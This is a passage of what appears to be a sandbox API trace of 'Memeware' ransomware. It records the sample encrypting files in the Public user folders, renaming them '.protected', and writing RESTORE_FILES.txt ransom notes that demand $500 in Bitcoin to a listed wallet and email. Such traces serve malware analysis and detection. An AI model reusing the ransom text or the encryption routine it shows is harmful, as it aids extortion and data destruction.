$500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.470] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.470] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.470] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.470] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.470] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.470] CloseHandle (hObject=0xa4) returned 1 [0095.470] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.470] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.470] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.470] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.471] lstrcmpiW (lpString1="desktop.ini", 
lpString2="$Recycle.bin") returned 1 [0095.471] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.471] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.471] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.471] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.471] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.471] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0xae, lpOverlapped=0x0) returned 1 [0095.472] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.472] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, 
lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0xae, lpOverlapped=0x0) returned 1 [0095.472] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.472] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.472] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.472] CloseHandle (hObject=0xa4) returned 1 [0095.473] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini.protected") returned 41 [0095.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.protected" (normalized: "c:\\users\\public\\desktop.ini.protected")) returned 1 [0095.473] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0095.473] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents") returned 29 [0095.473] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0095.473] 
lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0095.474] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\*") returned 31 [0095.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.474] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.474] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.474] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.474] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.474] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.474] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\.") returned 31 [0095.474] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.474] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.474] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.474] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.474] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\." 
(normalized: "c:\\users\\public\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.475] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.475] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\..") returned 32 [0095.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.475] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.475] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.475] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.475] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.475] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.475] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.476] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.476] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.476] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.476] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x116, lpOverlapped=0x0) returned 1 [0095.476] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.476] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x116, lpOverlapped=0x0) returned 1 [0095.476] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.476] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.477] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.477] CloseHandle (hObject=0xb4) returned 1 [0095.477] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.protected") returned 51 [0095.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.protected" (normalized: "c:\\users\\public\\documents\\desktop.ini.protected")) returned 1 [0095.478] 
FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="Windows") returned -1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="Program Files") returned -1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="Program Files (x86)") returned -1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="$Recycle.bin") returned 1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="System Volume Information") returned -1 [0095.478] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned 38 [0095.478] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0095.478] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0095.478] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned 40 [0095.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.478] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="Windows") returned -1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files") returned -1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files (x86)") returned -1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="$Recycle.bin") returned 1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="System Volume Information") returned -1 [0095.478] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned 41 [0095.478] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0095.478] lstrcmpW (lpString1="My Pictures", lpString2="..") 
returned 1 [0095.478] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned 43 [0095.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.478] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="Windows") returned -1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="Program Files") returned -1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="Program Files (x86)") returned -1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="$Recycle.bin") returned 1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="System Volume Information") returned -1 [0095.478] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned 39 [0095.478] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0095.478] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0095.478] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned 41 [0095.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.479] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.479] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.479] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\RESTORE_FILES.txt") returned 47 [0095.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\public\\documents\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.479] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.479] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.480] lstrlenA (lpString="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") returned 684 
[0095.480] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.480] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.480] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.480] CloseHandle (hObject=0xa4) returned 1 [0095.480] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="Windows") returned -1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="Program Files") returned -1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="Program Files (x86)") returned -1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="$Recycle.bin") returned 1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="System Volume Information") returned -1 [0095.480] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads") returned 29 [0095.480] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0095.480] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0095.480] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned 31 [0095.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.481] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.481] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0095.481] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.481] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.481] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.481] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\.") returned 31 [0095.481] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.481] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.481] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.481] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\." 
(normalized: "c:\\users\\public\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.481] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.481] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.481] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.481] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\..") returned 32 [0095.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.481] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.481] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.481] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.481] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.481] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.482] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.482] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.482] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrW 
